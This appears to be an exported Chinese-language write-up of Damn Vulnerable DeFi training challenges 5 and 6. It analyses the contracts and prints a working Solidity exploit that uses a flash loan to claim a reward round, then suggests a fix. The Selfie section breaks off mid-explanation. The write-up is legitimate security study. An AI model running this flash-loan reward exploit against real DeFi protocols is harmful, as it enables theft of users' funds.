<!DOCTYPE html><html><head>
      <title>Damn5-6</title>
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width, initial-scale=1.0">
      
      <link rel="stylesheet" href="file:///c:\Users\&#x5C0F;&#x6829;\.vscode\extensions\shd101wyy.markdown-preview-enhanced-0.6.3\node_modules\@shd101wyy\mume\dependencies\katex\katex.min.css">
      
      
      
      
      
      
      
      
      
      <style>
      /**
 * prism.js Github theme based on GitHub's theme.
 * @author Sam Clarke
 */
code[class*="language-"],
pre[class*="language-"] {
  color: #333;
  background: none;
  font-family: Consolas, "Liberation Mono", Menlo, Courier, monospace;
  text-align: left;
  white-space: pre;
  word-spacing: normal;
  word-break: normal;
  word-wrap: normal;
  line-height: 1.4;

  -moz-tab-size: 8;
  -o-tab-size: 8;
  tab-size: 8;

  -webkit-hyphens: none;
  -moz-hyphens: none;
  -ms-hyphens: none;
  hyphens: none;
}

/* Code blocks */
pre[class*="language-"] {
  padding: .8em;
  overflow: auto;
  /* border: 1px solid #ddd; */
  border-radius: 3px;
  /* background: #fff; */
  background: #f5f5f5;
}

/* Inline code */
:not(pre) > code[class*="language-"] {
  padding: .1em;
  border-radius: .3em;
  white-space: normal;
  background: #f5f5f5;
}

.token.comment,
.token.blockquote {
  color: #969896;
}

.token.cdata {
  color: #183691;
}

.token.doctype,
.token.punctuation,
.token.variable,
.token.macro.property {
  color: #333;
}

.token.operator,
.token.important,
.token.keyword,
.token.rule,
.token.builtin {
  color: #a71d5d;
}

.token.string,
.token.url,
.token.regex,
.token.attr-value {
  color: #183691;
}

.token.property,
.token.number,
.token.boolean,
.token.entity,
.token.atrule,
.token.constant,
.token.symbol,
.token.command,
.token.code {
  color: #0086b3;
}

.token.tag,
.token.selector,
.token.prolog {
  color: #63a35c;
}

.token.function,
.token.namespace,
.token.pseudo-element,
.token.class,
.token.class-name,
.token.pseudo-class,
.token.id,
.token.url-reference .token.variable,
.token.attr-name {
  color: #795da3;
}

.token.entity {
  cursor: help;
}

.token.title,
.token.title .token.punctuation {
  font-weight: bold;
  color: #1d3e81;
}

.token.list {
  color: #ed6a43;
}

.token.inserted {
  background-color: #eaffea;
  color: #55a532;
}

.token.deleted {
  background-color: #ffecec;
  color: #bd2c00;
}

.token.bold {
  font-weight: bold;
}

.token.italic {
  font-style: italic;
}


/* JSON */
.language-json .token.property {
  color: #183691;
}

.language-markup .token.tag .token.punctuation {
  color: #333;
}

/* CSS */
code.language-css,
.language-css .token.function {
  color: #0086b3;
}

/* YAML */
.language-yaml .token.atrule {
  color: #63a35c;
}

code.language-yaml {
  color: #183691;
}

/* Ruby */
.language-ruby .token.function {
  color: #333;
}

/* Markdown */
.language-markdown .token.url {
  color: #795da3;
}

/* Makefile */
.language-makefile .token.symbol {
  color: #795da3;
}

.language-makefile .token.variable {
  color: #183691;
}

.language-makefile .token.builtin {
  color: #0086b3;
}

/* Bash */
.language-bash .token.keyword {
  color: #0086b3;
}

/* highlight */
pre[data-line] {
  position: relative;
  padding: 1em 0 1em 3em;
}
pre[data-line] .line-highlight-wrapper {
  position: absolute;
  top: 0;
  left: 0;
  background-color: transparent;
  display: block;
  width: 100%;
}

pre[data-line] .line-highlight {
  position: absolute;
  left: 0;
  right: 0;
  padding: inherit 0;
  margin-top: 1em;
  background: hsla(24, 20%, 50%,.08);
  background: linear-gradient(to right, hsla(24, 20%, 50%,.1) 70%, hsla(24, 20%, 50%,0));
  pointer-events: none;
  line-height: inherit;
  white-space: pre;
}

pre[data-line] .line-highlight:before, 
pre[data-line] .line-highlight[data-end]:after {
  content: attr(data-start);
  position: absolute;
  top: .4em;
  left: .6em;
  min-width: 1em;
  padding: 0 .5em;
  background-color: hsla(24, 20%, 50%,.4);
  color: hsl(24, 20%, 95%);
  font: bold 65%/1.5 sans-serif;
  text-align: center;
  vertical-align: .3em;
  border-radius: 999px;
  text-shadow: none;
  box-shadow: 0 1px white;
}

pre[data-line] .line-highlight[data-end]:after {
  content: attr(data-end);
  top: auto;
  bottom: .4em;
}html body{font-family:"Helvetica Neue",Helvetica,"Segoe UI",Arial,freesans,sans-serif;font-size:16px;line-height:1.6;color:#333;background-color:#fff;overflow:initial;box-sizing:border-box;word-wrap:break-word}html body>:first-child{margin-top:0}html body h1,html body h2,html body h3,html body h4,html body h5,html body h6{line-height:1.2;margin-top:1em;margin-bottom:16px;color:#000}html body h1{font-size:2.25em;font-weight:300;padding-bottom:.3em}html body h2{font-size:1.75em;font-weight:400;padding-bottom:.3em}html body h3{font-size:1.5em;font-weight:500}html body h4{font-size:1.25em;font-weight:600}html body h5{font-size:1.1em;font-weight:600}html body h6{font-size:1em;font-weight:600}html body h1,html body h2,html body h3,html body h4,html body h5{font-weight:600}html body h5{font-size:1em}html body h6{color:#5c5c5c}html body strong{color:#000}html body del{color:#5c5c5c}html body a:not([href]){color:inherit;text-decoration:none}html body a{color:#08c;text-decoration:none}html body a:hover{color:#00a3f5;text-decoration:none}html body img{max-width:100%}html body>p{margin-top:0;margin-bottom:16px;word-wrap:break-word}html body>ul,html body>ol{margin-bottom:16px}html body ul,html body ol{padding-left:2em}html body ul.no-list,html body ol.no-list{padding:0;list-style-type:none}html body ul ul,html body ul ol,html body ol ol,html body ol ul{margin-top:0;margin-bottom:0}html body li{margin-bottom:0}html body li.task-list-item{list-style:none}html body li>p{margin-top:0;margin-bottom:0}html body .task-list-item-checkbox{margin:0 .2em .25em -1.8em;vertical-align:middle}html body .task-list-item-checkbox:hover{cursor:pointer}html body blockquote{margin:16px 0;font-size:inherit;padding:0 15px;color:#5c5c5c;background-color:#f0f0f0;border-left:4px solid #d6d6d6}html body blockquote>:first-child{margin-top:0}html body blockquote>:last-child{margin-bottom:0}html body hr{height:4px;margin:32px 0;background-color:#d6d6d6;border:0 none}html body table{margin:10px 0 15px 0;border-collapse:collapse;border-spacing:0;display:block;width:100%;overflow:auto;word-break:normal;word-break:keep-all}html body table th{font-weight:bold;color:#000}html body table td,html body table th{border:1px solid #d6d6d6;padding:6px 13px}html body dl{padding:0}html body dl dt{padding:0;margin-top:16px;font-size:1em;font-style:italic;font-weight:bold}html body dl dd{padding:0 16px;margin-bottom:16px}html body code{font-family:Menlo,Monaco,Consolas,'Courier New',monospace;font-size:.85em !important;color:#000;background-color:#f0f0f0;border-radius:3px;padding:.2em 0}html body code::before,html body code::after{letter-spacing:-0.2em;content:"\00a0"}html body pre>code{padding:0;margin:0;font-size:.85em !important;word-break:normal;white-space:pre;background:transparent;border:0}html body .highlight{margin-bottom:16px}html body .highlight pre,html body pre{padding:1em;overflow:auto;font-size:.85em !important;line-height:1.45;border:#d6d6d6;border-radius:3px}html body .highlight pre{margin-bottom:0;word-break:normal}html body pre code,html body pre tt{display:inline;max-width:initial;padding:0;margin:0;overflow:initial;line-height:inherit;word-wrap:normal;background-color:transparent;border:0}html body pre code:before,html body pre tt:before,html body pre code:after,html body pre tt:after{content:normal}html body p,html body blockquote,html body ul,html body ol,html body dl,html body pre{margin-top:0;margin-bottom:16px}html body kbd{color:#000;border:1px solid #d6d6d6;border-bottom:2px solid #c7c7c7;padding:2px 4px;background-color:#f0f0f0;border-radius:3px}@media print{html body{background-color:#fff}html body h1,html body h2,html body h3,html body h4,html body h5,html body h6{color:#000;page-break-after:avoid}html body blockquote{color:#5c5c5c}html body pre{page-break-inside:avoid}html body table{display:table}html body img{display:block;max-width:100%;max-height:100%}html body pre,html body code{word-wrap:break-word;white-space:pre}}.markdown-preview{width:100%;height:100%;box-sizing:border-box}.markdown-preview .pagebreak,.markdown-preview .newpage{page-break-before:always}.markdown-preview pre.line-numbers{position:relative;padding-left:3.8em;counter-reset:linenumber}.markdown-preview pre.line-numbers>code{position:relative}.markdown-preview pre.line-numbers .line-numbers-rows{position:absolute;pointer-events:none;top:1em;font-size:100%;left:0;width:3em;letter-spacing:-1px;border-right:1px solid #999;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none}.markdown-preview pre.line-numbers .line-numbers-rows>span{pointer-events:none;display:block;counter-increment:linenumber}.markdown-preview pre.line-numbers .line-numbers-rows>span:before{content:counter(linenumber);color:#999;display:block;padding-right:.8em;text-align:right}.markdown-preview .mathjax-exps .MathJax_Display{text-align:center !important}.markdown-preview:not([for="preview"]) .code-chunk .btn-group{display:none}.markdown-preview:not([for="preview"]) .code-chunk .status{display:none}.markdown-preview:not([for="preview"]) .code-chunk .output-div{margin-bottom:16px}.scrollbar-style::-webkit-scrollbar{width:8px}.scrollbar-style::-webkit-scrollbar-track{border-radius:10px;background-color:transparent}.scrollbar-style::-webkit-scrollbar-thumb{border-radius:5px;background-color:rgba(150,150,150,0.66);border:4px solid rgba(150,150,150,0.66);background-clip:content-box}html body[for="html-export"]:not([data-presentation-mode]){position:relative;width:100%;height:100%;top:0;left:0;margin:0;padding:0;overflow:auto}html body[for="html-export"]:not([data-presentation-mode]) .markdown-preview{position:relative;top:0}@media screen and (min-width:914px){html body[for="html-export"]:not([data-presentation-mode]) .markdown-preview{padding:2em calc(50% - 457px + 2em)}}@media screen and (max-width:914px){html body[for="html-export"]:not([data-presentation-mode]) .markdown-preview{padding:2em}}@media screen and (max-width:450px){html body[for="html-export"]:not([data-presentation-mode]) .markdown-preview{font-size:14px !important;padding:1em}}@media print{html body[for="html-export"]:not([data-presentation-mode]) #sidebar-toc-btn{display:none}}html body[for="html-export"]:not([data-presentation-mode]) #sidebar-toc-btn{position:fixed;bottom:8px;left:8px;font-size:28px;cursor:pointer;color:inherit;z-index:99;width:32px;text-align:center;opacity:.4}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] #sidebar-toc-btn{opacity:1}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .md-sidebar-toc{position:fixed;top:0;left:0;width:300px;height:100%;padding:32px 0 48px 0;font-size:14px;box-shadow:0 0 4px rgba(150,150,150,0.33);box-sizing:border-box;overflow:auto;background-color:inherit}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .md-sidebar-toc::-webkit-scrollbar{width:8px}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .md-sidebar-toc::-webkit-scrollbar-track{border-radius:10px;background-color:transparent}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .md-sidebar-toc::-webkit-scrollbar-thumb{border-radius:5px;background-color:rgba(150,150,150,0.66);border:4px solid rgba(150,150,150,0.66);background-clip:content-box}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .md-sidebar-toc a{text-decoration:none}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .md-sidebar-toc ul{padding:0 1.6em;margin-top:.8em}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .md-sidebar-toc li{margin-bottom:.8em}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .md-sidebar-toc ul{list-style-type:none}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .markdown-preview{left:300px;width:calc(100% -  300px);padding:2em calc(50% - 457px -  150px);margin:0;box-sizing:border-box}@media screen and (max-width:1274px){html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .markdown-preview{padding:2em}}@media screen and (max-width:450px){html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .markdown-preview{width:100%}}html body[for="html-export"]:not([data-presentation-mode]):not([html-show-sidebar-toc]) .markdown-preview{left:50%;transform:translateX(-50%)}html body[for="html-export"]:not([data-presentation-mode]):not([html-show-sidebar-toc]) .md-sidebar-toc{display:none}
/* Please visit the URL below for more information: */
/*   https://shd101wyy.github.io/markdown-preview-enhanced/#/customize-css */

      </style>
    </head>
    <body for="html-export">
      <div class="mume markdown-preview  ">
      <h1 class="mume-header" id="damn-defi%E9%9D%B6%E5%9C%BA%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%955-6">Damn Defi&#x9776;&#x573A;&#x5237;&#x9898;&#x8BB0;&#x5F55;(5-6)</h1>

<pre class="language-text">author: Thomas_Xu
</pre>
<h2 class="mume-header" id="5-the-rewarder">5 the-rewarder</h2>

<p>FlashPool&#x4ECE;&#x4E00;&#x5F00;&#x59CB;&#x5C31;&#x83B7;&#x5F97;&#x4E00;&#x767E;&#x4E07;&#x4E2A;&#x4EE3;&#x5E01;&#xFF0C;&#x63D0;&#x5230;&#x7684;4&#x4E2A;&#x4EBA;&#x4E2D;&#x7684;&#x6BCF;&#x4E00;&#x4E2A;&#x4EBA;&#x90FD;&#x83B7;&#x5F97;100&#x4E2A;DVT&#xFF0C;&#x8FD9;&#x4E9B;DVT&#x7ACB;&#x5373;&#x7531;&#x4ED6;&#x4EEC;&#x5B58;&#x5165;&#x5956;&#x52B1;&#x6C60;&#x3002;&#x5728;&#x6B64;&#x521D;&#x59CB;&#x8BBE;&#x7F6E;&#x4E4B;&#x540E;&#xFF0C;&#x65F6;&#x95F4;&#x63D0;&#x524D;5&#x5929;&#xFF0C;&#x5E76;&#x652F;&#x4ED8;&#x4E00;&#x8F6E;&#x5956;&#x52B1;&#xFF1A;&#x6BCF;&#x4EBA;25&#x4E2A;&#x5956;&#x52B1;&#x4EE3;&#x5E01;&#x3002;<br>
&#x8FD9;&#x9053;&#x9898;&#x6709;&#x56DB;&#x4E2A;&#x5408;&#x7EA6;&#xFF0C;&#x662F;&#x7B2C;&#x4E00;&#x9053;&#x591A;&#x5408;&#x7EA6;&#x7684;&#x9898;&#x76EE;&#x3002;&#x4E0D;&#x8FC7;&#x4E0D;&#x7528;&#x5BB3;&#x6015;&#xFF0C;&#x6211;&#x4EEC;&#x4E00;&#x4E2A;&#x4E00;&#x4E2A;&#x6765;&#x5206;&#x6790;&#x3002;</p>
<ul>
<li><strong>RewardToken</strong><br>
&#x8FD9;&#x662F;&#x4E00;&#x4E2A;&#x7B80;&#x5355;&#x7684;ERC20&#x7684;Token&#xFF0C;&#x6CA1;&#x6709;&#x4EC0;&#x4E48;&#x95EE;&#x9898;&#x3002;&#x552F;&#x4E00;&#x7684;&#x533A;&#x522B;&#x5C31;&#x662F;&#x8FD9;&#x4E2A;&#x5956;&#x52B1;&#x5E01;&#x53EF;&#x4EE5;&#x88AB;&#x65E0;&#x9650;&#x94F8;&#x9020;&#x3002;</li>
<li><strong>AccountingToken</strong><br>
&#x8FD9;&#x662F;&#x4E00;&#x4E2A;&#x6709;&#x8BBF;&#x95EE;&#x63A7;&#x5236;&#x7BA1;&#x7406;&#x7684;&#x5177;&#x6709;&#x4EA4;&#x6613;&#x5FEB;&#x7167;&#x529F;&#x80FD;&#x7684;Token&#xFF0C;&#x5E94;&#x8BE5;&#x662F;&#x9488;&#x5BF9;&#x6BCF;&#x4E00;&#x8F6E;&#x7684;&#x5956;&#x52B1;&#x800C;&#x5199;&#x7684;Token&#x3002;&#x4E0D;&#x8FC7;&#x770B;&#x4E0A;&#x53BB;&#x4E5F;&#x6CA1;&#x6709;&#x95EE;&#x9898;&#x3002;</li>
<li><strong>FlashLoanerPool</strong><br>
&#x8FD9;&#x662F;&#x6BD4;&#x8F83;&#x5E38;&#x89C1;&#x7684;&#x95EA;&#x7535;&#x8D37;&#x6C60;&#xFF0C;&#x8BA9;&#x6211;&#x4EEC;&#x6765;&#x5177;&#x4F53;&#x770B;&#x770B;&#x5B83;&#x662F;&#x600E;&#x4E48;&#x5B9E;&#x73B0;&#x7684;&#x3002;</li>
</ul>
<pre data-role="codeBlock" data-info class="language-"><code>function flashLoan(uint256 amount) external nonReentrant {
        uint256 balanceBefore = liquidityToken.balanceOf(address(this));
        require(amount &lt;= balanceBefore, &quot;Not enough token balance&quot;);

        require(msg.sender.isContract(), &quot;Borrower must be a deployed contract&quot;);
        
        liquidityToken.transfer(msg.sender, amount);

        msg.sender.functionCall(
            abi.encodeWithSignature(
                &quot;receiveFlashLoan(uint256)&quot;,
                amount
            )
        );

        require(liquidityToken.balanceOf(address(this)) &gt;= balanceBefore, &quot;Flash loan not paid back&quot;);
    }
</code></pre><p>&#x660E;&#x663E;&#x7684;&#xFF0C;&#x51FA;&#x73B0;&#x4E86;&#x5916;&#x90E8;&#x8C03;&#x7528;&#xFF0C;&#x8FD9;&#x5E94;&#x8BE5;&#x7ACB;&#x9A6C;&#x5F15;&#x8D77;&#x6211;&#x4EEC;&#x7684;&#x8B66;&#x89C9;&#xFF0C;&#x8FD9;&#x610F;&#x5473;&#x7740;&#x6211;&#x4EEC;&#x53EF;&#x80FD;&#x5229;&#x7528;<code>receiveFlashLoan()</code>&#x51FD;&#x6570;&#x5E72;&#x4E00;&#x4E9B;&#x574F;&#x4E8B;&#x3002;</p>
<ul>
<li><strong>TheRewarderPool</strong><br>
&#x8FD9;&#x5E94;&#x8BE5;&#x662F;&#x8FD9;&#x4E2A;&#x7CFB;&#x7EDF;&#x6700;&#x6838;&#x5FC3;&#x7684;&#x5408;&#x7EA6;&#x4E86;&#xFF0C;&#x91CC;&#x9762;&#x6709;&#x5B58;&#x6B3E;&#xFF0C;&#x5956;&#x52B1;&#xFF0C;&#x53D6;&#x6B3E;&#x7684;&#x4E00;&#x7CFB;&#x5217;&#x6D41;&#x7A0B;&#x3002;</li>
</ul>
<blockquote>
<p>&#x5B58;&#x6B3E;&#x4F1A;&#x89E6;&#x53D1;&#x5956;&#x52B1;&#x5206;&#x914D;&#x529F;&#x80FD;&#x3002; &#x9996;&#x5148;&#x68C0;&#x67E5;&#x662F;&#x5426;&#x7ECF;&#x8FC7;&#x4E86;&#x8DB3;&#x591F;&#x7684;&#x65F6;&#x95F4;&#x6765;&#x5F00;&#x59CB;&#x65B0;&#x4E00;&#x8F6E;&#xFF0C;&#x5982;&#x679C;&#x662F;&#xFF0C;&#x5B83;&#x5C06;&#x521B;&#x5EFA;&#x5FEB;&#x7167;&#x3002;&#x65E0;&#x8BBA;&#x54EA;&#x79CD;&#x65B9;&#x5F0F;&#xFF0C;&#x5B83;&#x90FD;&#x4F1A;&#x6839;&#x636E;&#x4ED6;&#x4E0E;&#x6240;&#x6709;&#x5176;&#x4ED6;&#x7528;&#x6237;&#x7684;&#x5B58;&#x6B3E;&#x91D1;&#x989D;&#x6765;&#x8BA1;&#x7B97;&#x547C;&#x53EB;&#x8005;&#x7684;&#x5956;&#x52B1;&#x3002;&#x7136;&#x540E;&#xFF0C;&#x5B83;&#x68C0;&#x67E5;&#x8C03;&#x7528;&#x65B9;&#x662F;&#x5426;&#x5DF2;&#x7ECF;&#x68C0;&#x7D22;&#x5230;&#x5F53;&#x524D;&#x56DE;&#x5408;&#x7684;&#x5956;&#x52B1;&#xFF0C;&#x5982;&#x679C;&#x6CA1;&#x6709;&#xFF0C;&#x5219;&#x94F8;&#x9020;&#x8BA1;&#x7B97;&#x51FA;&#x7684;&#x5956;&#x52B1;&#x4EE3;&#x5E01;&#x6570;&#x91CF;&#x3002;</p>
</blockquote>
<p>&#x5728;&#x4E86;&#x89E3;&#x4E86;&#x5DE5;&#x4F5C;&#x539F;&#x7406;&#x4E4B;&#x540E;&#xFF0C;&#x6211;&#x6CE8;&#x610F;&#x5230;&#x4E86;&#x8FD9;&#x4E2A;&#x95EE;&#x9898;&#xFF1A;&#x5982;&#x679C;&#x4F60;&#x7684;&#x65F6;&#x95F4;&#x5B89;&#x6392;&#x5F97;&#x5F53;&#xFF0C;&#x5E76;&#x7528;&#x4F60;&#x7684;&#x5B58;&#x6B3E;&#x5F00;&#x59CB;&#x65B0;&#x4E00;&#x8F6E;&#xFF0C;<strong>&#x4F60;&#x53EF;&#x4EE5;&#x7ACB;&#x5373;&#x9886;&#x53D6;&#x8BE5;&#x8F6E;&#x7684;&#x5956;&#x52B1;&#x5E76;&#x9000;&#x51FA;</strong>&#x3002;&#x4ECE;&#x53E6;&#x4E00;&#x4EFD;&#x5408;&#x540C;&#x4E2D;&#x5B8C;&#x6210;&#x6240;&#x6709;&#x8FD9;&#x4E9B;&#x64CD;&#x4F5C;&#xFF0C;&#x8FD9;&#x610F;&#x5473;&#x7740;&#x5728;&#x4E00;&#x6B21;&#x4EA4;&#x6613;&#x4E2D;&#xFF0C;&#x60A8;&#x53EF;&#x4EE5;&#x4F7F;&#x7528;&#x95EA;&#x56DE;&#x7B26;&#x5E76;&#x7D22;&#x53D6;&#x5927;&#x90E8;&#x5206;&#x5956;&#x52B1;&#x3002;</p>
<ul>
<li><strong>Exploit</strong><br>
&#x95EA;&#x7535;&#x8D37;&#x51FD;&#x6570;&#x6709;&#x4E00;&#x4E2A;&#x5916;&#x90E8;&#x8C03;&#x7528;&#x53EF;&#x4EE5;&#x88AB;&#x6211;&#x4EEC;&#x5229;&#x7528;&#xFF0C;&#x800C;&#x5956;&#x52B1;&#x6C60;&#x91CC;&#x6211;&#x4EEC;&#x53EA;&#x9700;&#x8981;&#x5B58;&#x6B3E;&#x8FDB;&#x53BB;&#xFF0C;&#x5C31;&#x53EF;&#x4EE5;&#x7ACB;&#x5373;&#x83B7;&#x53D6;&#x5956;&#x52B1;&#x5E76;&#x9000;&#x51FA;&#x3002;</li>
</ul>
<blockquote>
<p>&#x90A3;&#x4E48;&#x6211;&#x4EEC;&#x5C31;&#x53EF;&#x4EE5;&#x4ECE;&#x95EA;&#x7535;&#x8D37;&#x6C60;&#x91CC;jiu&#x501F;&#x94B1;&#x5B58;&#x5230;&#x5956;&#x52B1;&#x6C60;&#x91CC;&#xFF0C;&#x9886;&#x53D6;&#x5956;&#x52B1;&#x540E;&#x53D6;&#x6B3E;&#xFF0C;&#x6700;&#x540E;&#x628A;&#x94B1;&#x8FD8;&#x7ED9;&#x501F;&#x8D37;&#x6C60;&#x5C31;&#x5927;&#x529F;&#x544A;&#x6210;&#x4E86;&#x3002;</p>
</blockquote>
<p>&#x6765;&#x770B;&#x4EE3;&#x7801;</p>
<pre data-role="codeBlock" data-info class="language-"><code>pragma solidity ^0.8.0;

import &quot;./FlashLoanerPool.sol&quot;;
import &quot;./TheRewarderPool.sol&quot;;
import &quot;../DamnValuableToken.sol&quot;;

contract RewarderExploit{

    FlashLoanerPool loanpool;
    TheRewarderPool rewardpool;
    RewardToken public immutable rewardToken;
    DamnValuableToken public immutable liquidityToken;
    address attacker;

    constructor(address _loanpool, address _rewardpool, address _tokenAddress, address _rewardToken){
        loanpool = FlashLoanerPool(_loanpool);
        rewardpool = TheRewarderPool(_rewardpool);
        liquidityToken = DamnValuableToken(_tokenAddress);
        rewardToken = RewardToken(_rewardToken);
        attacker = msg.sender;
    }

    function attack(uint256 _amount) public {
        loanpool.flashLoan(_amount);
    }

    function receiveFlashLoan(uint256 _amount) payable external{
        liquidityToken.approve(address(rewardpool), _amount);
        rewardpool.deposit(_amount);
        uint256 rewards = rewardpool.distributeRewards();
        rewardToken.transfer(attacker, rewards);
        rewardpool.withdraw(_amount);
        liquidityToken.transfer(address(loanpool), _amount);
    }
}
</code></pre><ul>
<li>&#x603B;&#x7ED3;<br>
&#x8FD9;&#x5E94;&#x8BE5;&#x662F;&#x6240;&#x6709;&#x5E0C;&#x671B;&#x6FC0;&#x52B1;&#x7528;&#x6237;&#x5B58;&#x6B3E;&#x7684;&#x7CFB;&#x7EDF;&#x90FD;&#x4F1A;&#x9762;&#x4E34;&#x7684;&#x6F0F;&#x6D1E;&#xFF08;&#x6682;&#x4E14;&#x53EB;&#x95EA;&#x501F;&#x653B;&#x51FB;&#x5427;&#xFF09;&#xFF0C;&#x5373;&#x4F7F;&#x60A8;&#x4E3A;&#x4E86;&#x9632;&#x6B62;&#x6765;&#x81EA;&#x95EA;&#x501F;&#x653B;&#x51FB;&#xFF0C;&#x5F3A;&#x5236;&#x5C06;&#x56DE;&#x5408;&#x5F00;&#x59CB;&#xFF08;&#x5FEB;&#x7167;&#xFF09;&#x653E;&#x5728;&#x4E0E;&#x6D41;&#x52A8;&#x6027;&#x5B58;&#x6B3E;&#x4E0D;&#x540C;&#x7684;&#x4EA4;&#x6613;&#xFF0C;&#x62E5;&#x6709;&#x5927;&#x91CF;&#x4EE3;&#x5E01;&#x7684;&#x7528;&#x6237;&#x4ECD;&#x7136;&#x53EF;&#x4EE5;&#x5728;&#x4E00;&#x8F6E;&#x7ED3;&#x675F;&#x65F6;&#x5B58;&#x5165;&#x5B83;&#x4EEC;&#xFF0C;&#x5E76;&#x5728;&#x65B0;&#x4E00;&#x8F6E;&#x5F00;&#x59CB;&#x540E;&#x7ACB;&#x5373;&#x63D0;&#x6B3E;&#x3002;&#x4F60;&#x7684;&#x534F;&#x8BAE;&#x53EF;&#x80FD;&#x5E0C;&#x671B;&#x6FC0;&#x52B1;&#x957F;&#x671F;&#x8D28;&#x62BC;&#xFF0C;&#x800C;&#x4E0D;&#x662F;&#x77ED;&#x671F;&#x5957;&#x5229;&#x4EA4;&#x6613;&#x3002;<br>
&#x56E0;&#x6B64;&#xFF0C;&#x6700;&#x597D;&#x662F;&#x6446;&#x8131;&#x56DE;&#x5408;&#xFF0C;&#x6839;&#x636E;&#x5B58;&#x6B3E;&#x7684;&#x6BCF;&#x4E00;&#x79D2;&#x6765;&#x8BA1;&#x7B97;&#x5956;&#x52B1;&#xFF0C;&#x5C31;&#x50CF;&#x4ECA;&#x5929;&#x8BB8;&#x591A;&#x73B0;&#x4EE3;DeFi&#x9879;&#x76EE;&#x6240;&#x505A;&#x7684;&#x90A3;&#x6837;&#x3002;</li>
</ul>
<h2 class="mume-header" id="6-selfie">6 Selfie</h2>

<p>&#x8FD9;&#x4E2A;&#x9898;&#x548C;&#x4EE5;&#x5F80;&#x7684;&#x9898;&#x552F;&#x4E00;&#x4E0D;&#x540C;&#x7684;&#x5730;&#x65B9;&#xFF0C;&#x5C31;&#x662F;&#x591A;&#x4E86;&#x4E00;&#x4E2A;&#x6CBB;&#x7406;&#x673A;&#x5236;&#x3002;&#x4F46;&#x540C;&#x65F6;&#xFF0C;&#x8FD9;&#x4E2A;&#x6CBB;&#x7406;&#x673A;&#x5236;&#x5982;&#x679C;&#x4E0D;&#x5B89;&#x5168;&#xFF0C;&#x53CD;&#x800C;&#x4F1A;&#x9002;&#x5F97;&#x5176;&#x53CD;&#x3002;</p>
<ul>
<li>
<p><strong>SelfiePool</strong><br>
&#x8FD9;&#x4E2A;&#x6C60;&#x91CC;&#x6709;&#x4E00;&#x4E2A;&#x95EA;&#x7535;&#x8D37;&#x7684;&#x51FD;&#x6570;&#xFF0C;&#x540C;&#x65F6;&#x6709;&#x4E00;&#x4E2A;&#x7279;&#x6B8A;&#x7684;&#x53EF;&#x4EE5;&#x8F6C;&#x51FA;&#x6240;&#x6709;&#x8D44;&#x91D1;&#x7684;&#x51FD;&#x6570;<code>drainAllFunds()</code>&#x3002;&#x503C;&#x5F97;&#x6CE8;&#x610F;&#x7684;&#x662F;&#x8FD9;&#x4E2A;&#x51FD;&#x6570;&#x6709;&#x4E00;&#x4E2A;&#x4FEE;&#x9970;&#x7B26;<code>onlyGovernance</code>&#x4E5F;&#x5C31;&#x662F;&#x53EA;&#x80FD;&#x88AB;&#x6CBB;&#x7406;&#x5408;&#x7EA6;&#x6240;&#x8C03;&#x7528;&#xFF0C;&#x770B;&#x8D77;&#x6765;&#x975E;&#x5E38;&#x5B89;&#x5168;&#xFF0C;&#x4F46;&#x5176;&#x5B9E;&#x6211;&#x4EEC;&#x4E00;&#x65E6;&#x83B7;&#x5F97;&#x6CBB;&#x7406;&#x5408;&#x7EA6;&#x7684;&#x63A7;&#x5236;&#x6743;&#xFF0C;&#x6211;&#x4EEC;&#x5C31;&#x53EF;&#x4EE5;&#x69A8;&#x5E72;<code>SelfiePool</code>.</p>
</li>
<li>
<p><strong>SimpleGovernance</strong><br>
&#x8FD9;&#x5C31;&#x662F;&#x4E4B;&#x524D;&#x63D0;&#x5230;&#x7684;&#x6CBB;&#x7406;&#x5408;&#x7EA6;&#xFF0C;&#x663E;&#x800C;&#x6613;&#x89C1;&#x7684;&#x662F;&#x6211;&#x4EEC;&#x9700;&#x8981;&#x5728;&#x8FD9;&#x91CC;&#x9762;&#x627E;&#x5230;&#x6F0F;&#x6D1E;&#x5E72;&#x4E00;&#x4E9B;&#x574F;&#x4E8B;&#x3002;&#x8BA9;&#x6211;&#x4EEC;&#x6765;&#x770B;&#x770B;&#x5427;&#x3002;<br>
&#x8FD9;&#x4E2A;&#x5408;&#x7EA6;&#x6BD4;&#x8F83;&#x590D;&#x6742;&#xFF0C;&#x6211;&#x4EEC;&#x7B80;&#x5355;&#x8BF4;&#x4E00;&#x8BF4;</p>
<ul>
<li>queueAction
<blockquote>
<p>&#x901A;&#x8FC7;&#x8FD9;&#x4E2A;&#x51FD;&#x6570;&#x6211;&#x4EEC;&#x53EF;&#x4EE5;&#x628A;data&#x653E;&#x8FDB;&#x961F;&#x5217;&#xFF0C;&#x800C;&#x4E3A;&#x4E86;&#x6210;&#x529F;&#x6392;&#x961F;&#xFF0C;&#x6211;&#x4EEC;&#x5FC5;&#x987B;&#x62E5;&#x6709;&#x603B;&#x4F9B;&#x5E94;&#x91CF;&#x7684;&#x4E00;&#x534A;&#x4EE5;&#x4E0A;&#xFF0C;&#x800C;&#x7531;&#x4E8E;&#x6211;&#x4EEC;&#x73B0;&#x5728;&#x6709;&#x95EA;&#x501F;&#x6C60;&#xFF0C;&#x8FD9;&#x70B9;&#x5F88;&#x5BB9;&#x6613;&#x7ED5;&#x8FC7;&#x3002;<br>
